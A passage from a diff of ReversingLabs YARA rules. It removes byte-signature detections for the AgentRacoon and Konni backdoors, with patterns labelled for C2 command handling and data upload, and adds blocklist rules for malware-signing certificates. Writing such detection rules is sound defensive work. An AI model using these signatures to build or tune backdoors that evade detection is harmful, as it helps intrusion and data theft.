pe.signatures[i].serial=="3c:98:b6:87:2f:bb:1f:4a:e3:7a:4c:aa:74:9d:24:c2" and 1613370100<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Agentracoon : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE { meta: - description = "Yara rule that detects AgentRacoon backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ad74d530-ffbd-589f-b941-3a5d9ec737b6" - date = "2023-12-15" - modified = "2023-12-15" + id = "9c6d2be7-093c-5ce2-83af-6ab9b46603bc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/ByteCode.MSIL.Backdoor.AgentRacoon.yara#L1-L128" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3ba73f19f59c2e5880df820c52f16997047d7299eb14d421ae2ed8f3790bcfe9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11880-L11898" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ced47bd69b58de9e6b2aa7518ccceca088884acb79c0803c3defe6b115a0abb6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "AgentRacoon" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $unpack_response_p1 = { - 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 18 91 9C 11 ?? 73 ?? ?? ?? ?? 0A 06 16 6F ?? ?? - ?? ?? 2D ?? 73 ?? ?? ?? ?? 7A 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 19 91 9C 11 ?? 73 - ?? ?? ?? ?? 0A 06 1A 6F ?? ?? ?? ?? 2C ?? 06 1B 6F ?? ?? ?? ?? 2C ?? 06 1C 6F ?? ?? - ?? ?? 2C ?? 06 1D 6F ?? ?? ?? ?? 2C ?? 73 ?? ?? ?? ?? 7A 1F ?? 0B 2B ?? 07 17 58 0B - 03 07 91 2D ?? 07 17 58 0B 03 8E 69 07 59 0C 08 8D ?? ?? ?? ?? 0D 03 07 09 16 08 28 - ?? ?? ?? ?? 1A 13 ?? 2B ?? 11 ?? 17 58 13 ?? 09 11 ?? 91 2D ?? 11 ?? 17 58 13 ?? 09 - 8E 69 11 ?? 59 0C 08 8D ?? ?? ?? ?? 13 ?? 09 11 ?? 11 ?? 16 08 28 ?? ?? ?? ?? 02 12 - ?? FE 15 ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? - 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? - ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? - ?? 12 ?? 07 1F ?? 59 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? - ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 1A 59 8D ?? ?? ?? ?? 7D ?? - ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? - ?? 12 ?? 1A 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 - ?? 7D ?? ?? ?? ?? 03 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 18 - } - $unpack_response_p2 = { - 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1A 02 7C ?? ?? ?? ?? 7B ?? - ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1C 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? - ?? ?? 03 1E 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? - ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? - ?? 16 07 1F ?? 59 28 ?? ?? ?? ?? 09 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? - ?? ?? ?? 09 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 09 1A 02 7C ?? - ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? 1A 59 28 ?? ?? ?? ?? 11 ?? 16 02 7C ?? ?? ?? ?? 7B - ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 11 ?? 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 - ?? ?? ?? ?? 11 ?? 1A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 1A 28 ?? ?? ?? ?? 11 ?? 1E - 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 02 7C ?? - ?? ?? ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 1F ?? 91 13 ?? 02 7C ?? ?? ?? ?? 11 ?? - 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? - 28 ?? ?? ?? ?? 2A - } - $upload = { - 28 ?? ?? ?? ?? 0A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 16 0B 38 ?? - ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 06 02 7C ?? ?? ?? ?? - 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 02 7C ?? ?? ?? ?? - 7B ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 72 ?? ?? ?? ?? A2 11 ?? 17 02 7C ?? - ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? ?? 06 - A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? - 7B ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 - 14 6F ?? ?? ?? ?? 07 17 58 0B 07 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 3F - ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? - ?? ?? ?? 7D ?? ?? ?? ?? DE 23 0D 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 2A - } - $perform_request = { - 05 6F ?? ?? ?? ?? 0A 06 04 3D ?? ?? ?? ?? 06 04 19 5B 18 5A 3F ?? ?? ?? ?? 05 16 06 - 19 5B 6F ?? ?? ?? ?? 0B 05 06 19 5B 06 19 5B 6F ?? ?? ?? ?? 0C 05 06 19 5B 18 5A 6F - ?? ?? ?? ?? 0D 02 07 28 ?? ?? ?? ?? 0B 02 08 28 ?? ?? ?? ?? 0C 02 09 28 ?? ?? ?? ?? - 0D 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 07 - A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 08 A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 09 - A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 28 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? - ?? A2 11 ?? 1F ?? 02 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 38 ?? ?? ?? ?? 06 - 04 19 5B 18 5A 3D ?? ?? ?? ?? 06 04 19 5B 3F ?? ?? ?? ?? 05 16 06 18 5B 6F ?? ?? ?? - ?? 13 ?? 05 06 18 5B 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 - ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? - A2 11 ?? 18 11 ?? A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 11 ?? A2 11 ?? 1B 72 ?? ?? - ?? ?? A2 11 ?? 1C 02 28 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 7B ?? - ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 2B ?? 02 05 28 ?? ?? ?? ?? 13 ?? 1D 8D ?? ?? - ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 11 ?? A2 11 ?? 19 72 - ?? ?? ?? ?? A2 11 ?? 1A 02 28 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 02 - 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 05 2A - } - $get_txt_record = { - 14 0A 03 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? - 0D 09 08 08 8E 69 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 09 12 ?? 6F ?? ?? ?? ?? 13 ?? 09 6F ?? ?? ?? ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? - ?? ?? 13 ?? 28 ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? DE ?? 26 72 ?? - ?? ?? ?? 13 ?? DE ?? 11 ?? 2A - } - $main_loop = { - 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 18 16 16 6F ?? ?? ?? ?? 0A 06 28 - ?? ?? ?? ?? 2D ?? 2A 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 2A 7E ?? ?? - ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 12 ?? 7B ?? ?? ?? ?? 0D 12 ?? 7B - ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 7E ?? ?? ?? ?? 19 11 ?? 11 ?? - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 14 80 ?? ?? ?? ?? 2A 11 ?? 7E ?? ?? ?? ?? 28 ?? - ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? - ?? ?? 11 ?? 17 58 13 ?? 11 ?? 09 32 ?? 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0B 73 ?? - ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? - ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 - 17 6F ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? - 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DD ?? ?? ?? ?? 26 DE ?? 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OASIS COURT LIMITED" and (pe.signatures[i].serial=="00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures[i].serial=="e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f") and 1608508800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "2bce88d4-24e6-59e5-ae02-5284ec43cfa4" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11900-L11918" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7cb7d77abefd35f0756c5aa0983f7403cca4cbacd94dcc6b510c929bc96c8309" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($unpack_response_p*)) and ($upload) and ($perform_request) and ($get_txt_record) and ($main_loop) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KULBYT LLC" and (pe.signatures[i].serial=="00:e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" or pe.signatures[i].serial=="e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e") and 1614729600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE { meta: - description = "Yara rule that detects Konni backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c45c23c6-be15-58cc-ae4d-631bed4a3bb2" - date = "2023-12-07" - modified = "2023-12-07" + id = "63e2edab-11a4-55ba-b042-c88b6d2750a5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Win64.Backdoor.Konni.yara#L1-L205" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "37c45e3ed23ca9f4de876f666c9f6d9bf7eee5cb1650b02cdd9f58e2ccc4b5cb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11920-L11936" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "84402dc0a58fca36424d8d6d13c60b80342bb3792f4e32e23878530264358726" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "Konni" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $network_communication_p1 = { - 48 8B C4 53 55 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 3D ?? ?? ?? ?? 45 33 FF - 48 8B D9 4C 8D A7 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 49 8B CC 44 89 78 ?? 44 89 78 - ?? 45 8B F7 44 89 78 ?? 41 8B EF E8 ?? ?? ?? ?? 4C 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? - ?? ?? BA ?? ?? ?? ?? 49 8B CC 48 89 5C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 9F - ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 45 33 C9 45 33 C0 33 C9 41 8B - D5 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 48 85 C0 75 ?? 83 C8 ?? - 48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5D 5B C3 4C 89 7C 24 ?? 44 89 7C 24 ?? 41 B8 - ?? ?? ?? ?? 45 33 C9 48 8B D3 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? - ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 - C0 0F 84 ?? ?? ?? ?? 4C 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 - 33 C9 4D 8B C4 48 8B C8 4C 89 7C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 - ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 45 33 C9 45 33 C0 33 D2 48 8B C8 44 89 - 7C 24 ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 48 8B CB 85 C0 74 ?? 48 8D 94 24 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 48 8B CB 45 33 C0 33 D2 FF 15 ?? ?? ?? - ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? - 41 8B C5 E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB EB ?? FF C0 B9 ?? - ?? ?? ?? 8B D0 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 74 ?? 44 8B - } - $network_communication_p2 = { - 84 24 ?? ?? ?? ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8D 0D ?? - ?? ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 4C 8B E8 48 8B CB 48 83 F8 ?? 75 ?? 45 33 C9 45 33 C0 33 D2 FF 15 - ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? - ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 - 8B D4 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 1F 00 44 39 BC 24 - ?? ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 49 8B CC 41 8B EF E8 ?? ?? ?? ?? 48 85 C0 0F - 45 EF 3B EF 74 ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 49 8B CD - 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 44 03 B4 24 ?? ?? ?? ?? 33 - D2 49 8B CC E8 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 - 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B CD FF 15 ?? - ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 48 8B CB FF 15 ?? ?? ?? - ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? - 83 C8 ?? 45 85 F6 0F 44 E8 8B C5 48 8B B4 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41 - 5D 41 5C 5F 5D 5B C3 - } - $handle_c2_commands_p1 = { - 48 89 5C 24 ?? 48 89 74 24 ?? 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 - 48 89 84 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 8D 54 24 ?? 33 FF 48 8B CE 89 7C 24 - ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? - ?? ?? 48 8B 08 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B - ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 - 75 ?? 48 8B 4B ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 41 B8 - ?? ?? ?? ?? 66 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? - 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 53 ?? 48 8D 0D ?? - ?? ?? ?? 45 33 C0 FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? - ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 - 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 - } - $handle_c2_commands_p2 = { - 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 - ?? ?? ?? ?? 48 8B CE 85 C0 75 ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 D2 E8 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 0B E8 ?? ?? ?? ?? 48 63 4C 24 ?? - 48 8B 15 ?? ?? ?? ?? 48 8B 4C CB ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 63 4C - 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 3B 48 83 - C9 ?? 33 C0 66 F2 AF 33 D2 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? 48 8B 3B 48 83 - C9 ?? 33 C0 66 F2 AF 8D 50 ?? 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? - ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 48 8B CB FF 15 ?? ?? ?? ?? - 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B - 5B ?? 49 8B 73 ?? 49 8B E3 5F C3 - } - $create_cab_file_and_upload_p1 = { - 48 89 5C 24 ?? 55 56 57 41 54 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 - 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? 33 DB 48 8B F1 - 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? 44 8B E3 89 5C 24 ?? 89 5C 24 ?? 66 89 5D ?? E8 - ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 9D ?? ?? 00 00 E8 ?? - ?? ?? ?? 33 C0 48 8D 4C 24 ?? 66 89 5C 24 ?? 48 89 44 24 ?? 89 44 24 ?? 66 89 44 24 - ?? FF 15 ?? ?? ?? ?? 0F B7 54 24 ?? 0F B7 4C 24 ?? 44 0F B7 44 24 ?? 0F B7 44 24 ?? - 0F B7 7C 24 ?? 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 7C 24 ?? 44 89 44 24 ?? 4C 8D - 05 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? B9 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 4C 8D 4D ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 45 33 C0 FF 15 ?? ?? ?? - ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 53 ?? 48 8B CE E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? - ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? - ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D - 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 - ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 - } - $create_cab_file_and_upload_p2 = { - 8D 4D ?? 48 8B D6 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 48 8D 55 ?? 45 - 33 C0 48 8B CE FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 48 8D 4D ?? 45 8D 41 ?? BA - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 ?? 75 ?? 8B C3 EB ?? 33 D2 48 8B C8 - FF 15 ?? ?? ?? ?? 8B F0 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B C3 EB ?? FF C6 B9 - ?? ?? ?? ?? 8B D6 44 8B EE FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 75 ?? 48 8B CF FF 15 - ?? ?? ?? ?? 8B C3 EB ?? 4D 8B C5 33 D2 48 8B C8 E8 ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B - C6 49 8B D4 48 8B CF 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B - 44 24 ?? 89 44 24 ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8D 4D ?? 4C 89 B4 24 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 44 8B 6C 24 ?? B9 ?? ?? ?? ?? 41 83 C5 ?? 41 8B FD 41 8B - D5 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B C7 33 - D2 48 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33 - C0 48 83 C9 ?? 4C 8D 86 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 66 F2 AF 49 89 00 49 89 40 - ?? 48 F7 D1 49 89 40 ?? 49 89 40 ?? 48 